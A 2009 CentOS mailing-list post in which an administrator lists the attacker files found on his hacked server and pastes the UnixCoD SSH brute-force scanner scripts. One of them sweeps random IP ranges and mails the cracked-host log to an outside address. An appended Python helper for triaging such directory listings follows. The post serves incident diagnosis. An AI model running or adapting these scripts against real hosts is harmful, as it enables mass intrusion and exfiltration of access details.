[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

Wed Jun 3 16:33:26 UTC 2009
Linux Advocate <linuxhousedn at yahoo.com>

BRUCE U ARE A F******* GENIUS MAN !!!!!

u were right bro....thanx for spending the time on this man....

more info below !!!!!!!!!!!!!



----- Original Message ----
> From: bruce <bedouglas at earthlink.net>
> To: linuxhousedn at yahoo.com
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
> 
> hi...
> 
> i've seen a few of your threads on your issue of the 'atack' processes
> running from your web server...
> 
> i'm replying to you offline, as ......
> 
> 
> take a look over your box, and let's see what you have...
> 


As per your tip I found a file called atack under this folder /dev/shm/unix.... even though I could not locate such a file before.....
I have now removed that file and am now probing the contents of the /dev/shm/unix folder.....

[root at fwgw unix]# pwd
/dev/shm/unix

[root at fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02   124.164.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:28   129.135.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:25   129.find.22
-rwxr-xr-x 1 apache apache       0 May 25 13:54   21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16  60.191.find.22
-rw-r--r-- 1 apache apache       0 Jun  3 23:45   83.182.find.22
-rwxr-xr-x 1 apache apache    4631 Apr 21 17:50   84.2.find.22
-rwxr-xr-x 1 apache apache       0 May 25 06:17   89.38.find.22
-rwxr-xr-x 1 apache apache    2362 May 19 15:28   91.204.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005   auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41  data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005  find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45  log
-rwxr-xr-x 1 apache apache     751 May 25 06:33  unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04   vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56  x


The contents of file 'x' are:


#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"
X=0
c=0
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"
./find $1.$c 22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100 >> log
mail -s $1.$c yuli1989xxx at yahoo.com < log
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"
echo "[+] Next random class b !"
X=$((X+1))


The contents of the file 'unix' are:


#!/bin/bash
if [ $# != 1 ]; then
        echo "[+] Folosim : $0 [b class]"
        exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+]   SSH Brute force scanner : user & password   [+]"
echo "[+]        Undernet Channel : #yuli               [+]"
echo "[+][+][+][+][+][+][+] ver 0x10  [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"


The contents of 'auto' are:

#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
        echo -n "./assh $brange.$crange ; " >> $file
        let crange=crange+1
done


The contents of 'log' are:

[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]


Further googling indicates that UnixCoD is a brute-force SSH scanner... what is odd is that I have fail2ban running (which blocks IPs after 2 failed attempts) and an 8-letter passwd, but I still got hacked....

Guys...any comments....

AND ONCE AGAIN THANKS BRUCE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Regards,
Marco.
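A triage helper for a listing like the /dev/shm/unix one above, added here as an example and not part of the original thread: it parses `ls -al` output and flags the entries a responder would look at first. The sample listing is constructed from the post, and the heuristics (executables owned by the web-server user in a tmpfs directory, and the scanner's `<range>.find.<port>` result files) are assumptions drawn from the files shown in the post.

```python
"""Parse `ls -al` output and flag entries that look like dropped tooling.
Assumed heuristics: the web-server user should not own executables in
/dev/shm, and names like 60.191.find.22 match the scanner's result files."""
import re

# Constructed sample: a subset of the /dev/shm/unix listing from the post.
SAMPLE_LISTING = """\
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02 124.164.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16 60.191.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005 auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005 find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45 log
-rwxr-xr-x 1 apache apache     751 May 25 06:33 unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04 vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56 x
"""

# mode, link count, owner, group, size, month, day, time-or-year, name
LS_LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+(?P<size>\d+)\s+\S+\s+\d+\s+[\d:]+\s+(?P<name>.+)$")
# Scanner output files seen in the post, e.g. 60.191.find.22
SCAN_RESULT = re.compile(r"^\d+(\.\d+)*\.find\.\d+$")


def parse_listing(text):
    """Yield (mode, owner, size, name) for each regular-file entry."""
    for line in text.splitlines():
        m = LS_LINE.match(line.strip())
        if m and m.group("mode").startswith("-"):
            yield (m.group("mode"), m.group("owner"),
                   int(m.group("size")), m.group("name"))


def triage(text, web_user="apache"):
    """Return {name: [reasons]} for entries worth a closer look."""
    findings = {}
    for mode, owner, size, name in parse_listing(text):
        reasons = []
        if "x" in mode and owner == web_user:
            reasons.append("executable owned by the web-server user")
        if SCAN_RESULT.match(name):
            reasons.append("scanner result file (<range>.find.<port>)")
        if reasons:
            findings[name] = reasons
    return findings
```

Run it against `ls -al` output captured from any tmpfs or world-writable directory; zero-byte `*.find.22` files still count, since their names alone record which ranges were scanned.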